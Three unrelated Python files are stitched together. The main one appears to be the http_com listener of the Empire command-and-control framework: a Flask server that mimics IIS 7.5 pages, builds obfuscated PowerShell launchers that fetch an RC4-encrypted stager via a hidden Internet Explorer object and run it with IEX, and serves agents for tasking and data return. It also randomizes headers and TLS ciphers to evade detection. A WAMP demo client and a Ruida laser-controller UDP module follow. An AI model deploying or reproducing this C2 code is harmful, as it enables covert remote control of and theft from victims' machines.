'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description': 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
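        # DefaultProfile format is "uri1,uri2,...|User-Agent|extra headers...";
        # e.g. with the default above, self.uris becomes
        # ['admin/get.php', 'news.php', 'login/process.php'].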
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, bypasses: List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
        if not language:
            print(helpers.color('[!] listeners/http_com generate_launcher(): no language specified!'))
            return None
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
for bypass in bypasses:
stager += bypass
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("K") + "=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$' + helpers.generate_random_script_var_name(
"K") + '=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$' + helpers.generate_random_script_var_name(
"K") + '[$_%$' + helpers.generate_random_script_var_name(
"K") + '.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser=" + data_util.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
# Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization(
"$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization(
"-join[Char[]](& $R $data ($IV+$" + helpers.generate_random_script_var_name("K") + ")) | IEX")
if obfuscate:
stager = data_util.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print(helpers.color(
"[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module."))
else:
print(helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
stager = data_util.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
stagingKey = stagingKey.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = data_util.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print(helpers.color(
"[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = data_util.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print(helpers.color(
"[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module."))
else:
print(helpers.color('[!] listeners/http_com generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "/data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "/data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
if reqHeader.startswith("b'"):
tmp = repr(reqHeader)[2:-1].replace("'", "").encode("UTF-8")
else:
tmp = reqHeader.encode("UTF-8")
routingPacket = base64.b64decode(tmp)
except Exception as e:
routingPacket = None
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
                                if b'not in cache' in results:
                                    # signal the client to restage
                                    print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == b'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
# setting the cipher list allows for modification of the JA3 signature. Select a random cipher to change
# it every time the listener is launched
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
        listenerOptions = self.options
        if not name:
            name = listenerOptions['Name']['Value']
        self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
        self.threads[name].start()
        time.sleep(1)
        # returns True if the listener successfully started, false otherwise
        return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if not name:
name = self.options['Name']['Value']
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
|
wamp.py
|
""" WAMP networking. """
import asyncio
from queue import Queue
from threading import Thread
from autobahn.asyncio.wamp import ApplicationRunner, ApplicationSession
from autobahn.wamp.types import PublishOptions
class WampMoles(object):
def __init__(self):
self._thread = None
self._loop = asyncio.new_event_loop()
self._loop.add_signal_handler = self._add_signal_handler
self._queue = Queue()
def __call__(self):
asyncio.set_event_loop(self._loop)
runner = ApplicationRunner(
url=u"wss://demo.crossbar.io/ws", realm=u"realm1")
runner.run(MolesComponent)
def _add_signal_handler(self, *args, **kw):
raise NotImplementedError("Don't try this in threads or Windows")
def send(self, msg):
self._queue.put(msg)
def join(self):
if self._thread is not None:
self._loop.call_soon_threadsafe(self._loop.stop)  # loop.stop() is not thread-safe to call directly
self._thread.join()
self._thread = None
def start(self):
self._thread = Thread(target=self)
self._thread.daemon = True
self._thread.start()
class MolesComponent(ApplicationSession):
@asyncio.coroutine
def onJoin(self, details):
print("session ready")
def on_msg(msg):
print("event received: {0}", msg)
try:
yield from self.subscribe(on_msg, u'net.za.hodgestar.moles')
print("subscribed to topic")
except Exception as e:
print("could not subscribe to topic: {0}".format(e))
counter = 0
options = PublishOptions(exclude_me=False)
while True:
self.publish(
u'net.za.hodgestar.moles', "msg %d" % counter, options=options)
counter += 1
yield from asyncio.sleep(1)
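# Minimal usage sketch (not part of the original module): run the WAMP session
# in a background thread for a short while, then shut it down. Assumes network
# access to the demo crossbar router configured above.
if __name__ == "__main__":
import time
moles = WampMoles()
moles.start()
time.sleep(10)
moles.join()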
|
ruida.py
|
import logging
from enum import Enum
import time
from ruida_core import get_checksum, swizzle, unswizzle, ruida_bytes_to_unsigned
from socket import socket, AF_INET, SOCK_DGRAM, timeout as SocketTimeout
from multiprocessing import Process, Lock, Value
logger = logging.getLogger(__name__)
class MSGTypes(Enum):
MSG_ACK = b'\xcc'
MSG_ERROR = b'\xcd'
MSG_PROPERTY = b'\xda'
MSG_PROPERTY_QUERY = b'\x00'
MSG_PROPERTY_SET = b'\x01'
MSG_COMMAND_THRESHOLD = b'\x80'
class CMDTypes(Enum):
RUN_TIME = b'\x04\x11'
MACHINE_STATUS = b'\x04\x00'
class RuidaCommand(Enum):
GET_RUN_TIME = MSGTypes.MSG_PROPERTY.value + MSGTypes.MSG_PROPERTY_QUERY.value + CMDTypes.RUN_TIME.value
GET_MACHINE_STATUS = MSGTypes.MSG_PROPERTY.value + MSGTypes.MSG_PROPERTY_QUERY.value + CMDTypes.MACHINE_STATUS.value
def __init__(self, value):
# Each command is stored swizzled (the Ruida wire obfuscation) and prefixed
# with its checksum, ready to send as a single UDP datagram.
data = bytes([swizzle(b) for b in value])
cs = get_checksum(data)
self.bytes = cs + data
self.checksum = cs
@classmethod
def from_bytes(cls, b: bytes):
for e in cls:
if e.bytes == b:
return e
else:
raise ValueError(f"The value does not match a value in the Enum {cls.__name__}")
class RuidaCommunicator:
NETWORK_TIMEOUT = 10000  # milliseconds; converted to seconds for settimeout() below
INADDR_ANY_DOTTED = '0.0.0.0' # bind to all interfaces.
SOURCE_PORT = 40200 # Receive port
DEST_PORT = 50200 # Ruida Board
MTU = 1470 # max data length per datagram (minus checksum)
def __init__(self, host, dest_port=DEST_PORT, recv_port=SOURCE_PORT):
self.sock = socket(AF_INET, SOCK_DGRAM)
self.sock.bind((self.INADDR_ANY_DOTTED, recv_port))
self.sock.connect((host, dest_port))
self.sock.settimeout(self.NETWORK_TIMEOUT * 0.001)
self.host = host
def send(self, cmd: RuidaCommand):
self.sock.send(cmd.bytes)
def receive(self):
try:
resp = bytes([unswizzle(b) for b in self.sock.recv(self.MTU)])
except SocketTimeout:
logger.info("No new response received")
return
except ConnectionRefusedError:
# https://stackoverflow.com/a/2373630/4713758
# If the remote server does not have the port open, we get an ICMP response
logger.error(f"The server at {self.host}:{self.DEST_PORT} is refusing the message")
return
if len(resp) == 0:
logger.warning("Received empty packet")
return
if resp[0] == int.from_bytes(MSGTypes.MSG_ACK.value, "big"):
logger.info("Received ACK")
return
elif resp[0] == int.from_bytes(MSGTypes.MSG_ERROR.value, "big"):
logger.warning("Received error response")
return
else:
logger.info(f"Got response 0x{resp.hex()}")
return resp
